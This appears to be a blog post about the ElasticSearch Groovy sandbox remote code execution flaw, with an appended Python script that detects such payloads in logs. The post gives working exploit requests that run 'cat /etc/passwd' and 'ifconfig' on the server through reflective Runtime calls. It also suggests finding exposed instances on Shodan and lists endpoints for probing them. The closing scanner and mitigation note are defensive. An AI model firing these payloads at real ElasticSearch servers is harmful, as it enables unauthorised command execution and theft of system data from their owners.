Rookie

The world of Hitchhiker's Guide-1

A slash-career young person drifting around Dali

ElasticSearch Groovy Remote Code Execution Vulnerability

I recently ran into this on the company's internal network while using ElasticSearch, so I looked into it.

Vulnerability Principle

ElasticSearch is a search and analytics engine written in Java.

In 2014 a remote code execution vulnerability (CVE-2014-3120) was disclosed in its script query module. Because the engine lets search requests carry script code (MVEL) for manipulating data, an attacker could craft an MVEL script that executes arbitrary Java code.

Later the scripting engine was switched to Groovy and a sandbox was introduced to control it: dangerous code is supposed to be intercepted, but because the sandbox's restrictions are lax, remote code execution is still possible.

Vulnerability POC

The principle has been analyzed by many people, so I won't repeat it here. Let's get straight to the POC that everyone is looking forward to!

POST http://target:9200/_search?pretty 
{"size":1,"script_fields": {"test#": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

Real Internet Cases

The ElasticSearch port is an important fingerprint for the engine, and searching for it on Shodan works well too.

Check status: http://xxxx:9200/_status
Cluster health report: http://xxxx:9200/_cluster/health
Cluster node information: http://xxxx:9200/_nodes

http://xxx.com:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\nimport%20java.io.*;\nString%20str%20=%20\%22\%22;BufferedReader%20br%20=%20new%20BufferedReader(new%20InputStreamReader(Runtime.getRuntime().exec(\%22ifconfig\%22).getInputStream()));StringBuilder%20sb%20=%20new%20StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();%22}}}
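As an added example that is not part of the original post, here is a small Python scanner that checks _search requests, whether POSTed or passed in the ?source= query parameter as in the second form above, for Groovy scripts that use the reflection and Runtime calls seen in the payloads above. The host name and sample requests are constructed, and treating a missing "lang" as groovy is an assumption about 1.4.x defaults.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Indicators drawn from the payloads above: reflective class loading and process APIs.
SUSPICIOUS = re.compile(r"\.class\.forName\(|getRuntime\(\)|ProcessBuilder|\.exec\(")

def iter_scripts(node):
    """Yield (lang, script) for every inline script anywhere in a search body.
    Assumption: a missing "lang" means the node default, groovy on 1.4.x."""
    if isinstance(node, dict):
        if isinstance(node.get("script"), str):
            yield node.get("lang", "groovy"), node["script"]
        for value in node.values():
            yield from iter_scripts(value)
    elif isinstance(node, list):
        for value in node:
            yield from iter_scripts(value)

def request_body(url, body=None):
    """Return the parsed search body, whether POSTed or passed URL-encoded in
    the "source" query parameter (the GET form shown above), else None."""
    if body is None:
        body = parse_qs(urlsplit(url).query).get("source", [None])[0]
    try:
        return json.loads(body) if body else None
    except json.JSONDecodeError:
        return None

def flag_request(url, body=None):
    """Return the groovy scripts in one request that match the indicators."""
    return [s for lang, s in iter_scripts(request_body(url, body))
            if lang == "groovy" and SUSPICIOUS.search(s)]

# Constructed sample requests (not real traffic): a benign script field, a
# POST carrying a reflection payload, and a GET carrying one in ?source=.
SAMPLES = [
    ("http://es.internal:9200/_search?pretty",
     '{"script_fields":{"d":{"script":"doc[\'price\'].value * 2","lang":"groovy"}}}'),
    ("http://es.internal:9200/_search?pretty",
     '{"script_fields":{"t":{"script":"java.lang.Math.class.forName(\\"java.lang.Runtime\\")","lang":"groovy"}}}'),
    ("http://es.internal:9200/_search?source=%7B%22script_fields%22%3A%7B%22e%22%3A"
     "%7B%22script%22%3A%22Runtime.getRuntime().exec(%5C%22id%5C%22)%22%7D%7D%7D", None),
]

def scan_samples():
    # Number of flagged scripts per sample request, in SAMPLES order.
    return [len(flag_request(url, body)) for url, body in SAMPLES]
```

On the node side the real fix is upgrading or turning dynamic Groovy scripting off (script.groovy.sandbox.enabled: false on 1.4.x nodes); this scan is only for spotting attempts in access or proxy logs.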